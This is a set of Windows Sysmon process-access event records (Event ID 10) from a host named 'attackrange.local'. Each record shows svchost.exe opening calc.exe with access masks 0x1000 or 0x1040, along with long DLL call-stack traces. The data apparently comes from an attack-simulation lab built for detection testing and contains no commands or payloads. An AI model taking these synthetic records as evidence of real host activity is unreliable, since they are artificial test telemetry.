10341000x8000000000000000360272Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360271Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360270Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360269Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360268Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360267Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360266Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360265Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360264Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360263Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360262Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360261Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360260Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360259Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360258Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360257Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360256Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360255Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360254Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360253Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360252Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360251Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
